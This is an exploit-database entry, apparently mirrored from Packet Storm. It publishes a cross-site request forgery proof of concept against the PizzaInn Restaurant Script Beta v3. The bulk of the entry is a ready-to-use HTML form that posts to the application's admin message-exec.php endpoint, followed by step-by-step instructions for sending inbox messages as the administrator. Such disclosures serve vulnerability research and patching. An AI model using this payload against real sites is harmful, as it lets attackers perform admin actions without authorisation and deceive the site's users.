Lucene search
K

PizzaInn Beta 3 message-exec.php Cross Site Request Forgery

🗓️ 20 Oct 2016 00:00:00Reported by Nassim AsrirType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

PizzaInn Beta 3 message-exec.php Cross Site Request Forgery vulnerability in webapp

Code
`# Exploit Title :----------------- : PizzaInn Restaurant Scripti (Beta v3) - (message-exec.php) - CSRF Send Inbox Message.  
# Author :------------------------ : Nassim Asrir   
# Author Company :------------------------ : HenceForth  
# Author Email :------------------------ : [email protected]  
# Google Dork :---------------- : -  
# Date :-------------------------- : 20/10/2016  
# Type :-------------------------- : webapps  
# Platform : -------------------- : PHP   
# Software link : -------------- : http://wmscripti.com/php-scriptler/pizzainn-restaurant-scripti-beta-v3.html  
  
  
############################ CSRF Send Inbox Message Vulnerabilty ############################  
  
## Exploit ##  
  
<h1>Messages Management </h1>  
</div>  
<div id="container">  
<form id="messageForm" name="messageForm" method="post" action="http://localhost/script/admin/message-exec.php" onsubmit="return messageValidate(this)">  
<table width="540" border="0" cellpadding="2" cellspacing="0" align="center">  
<CAPTION><h3>SEND A MESSAGE</h3></CAPTION>  
<tr>  
<th width="200">Subject</th>  
<td width="168"><input type="text" name="subject" id="subject" class="textfield" /></td>  
</tr>  
<tr>  
<th width="200">Message Box</th>  
<td width="168"><textarea name="txtmessage" class="textfield" rows="5" cols="60"></textarea></td>  
</tr>  
<tr>  
<td>&nbsp;</td>  
<td align="center"><input type="submit" name="Submit" value="Send Message" />  
<input type="reset" name="Reset" value="Clear Field" /></td>  
</tr>  
</table>  
</form>  
<hr>  
<table border="0" width="1000" align="center">  
<CAPTION><h3>CSRF By Nassim Asrir</h3></CAPTION>  
  
## Proc ##  
  
- P.S: You must to register in the site to see the Inbox Message send by Admin.  
  
- Create a .html File and Put the Code.  
  
- Navigate the File in your Localhost .  
  
- and Create Message in The Text Box and you redirect to http://site/script/admin/access-denied.php  
  
- and You get the Message "Access Denied! You do not have access to this resource." but don't worry. when you get the Message go to Your account . and you can see [Inbox] Navigate it and you see the Message .  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation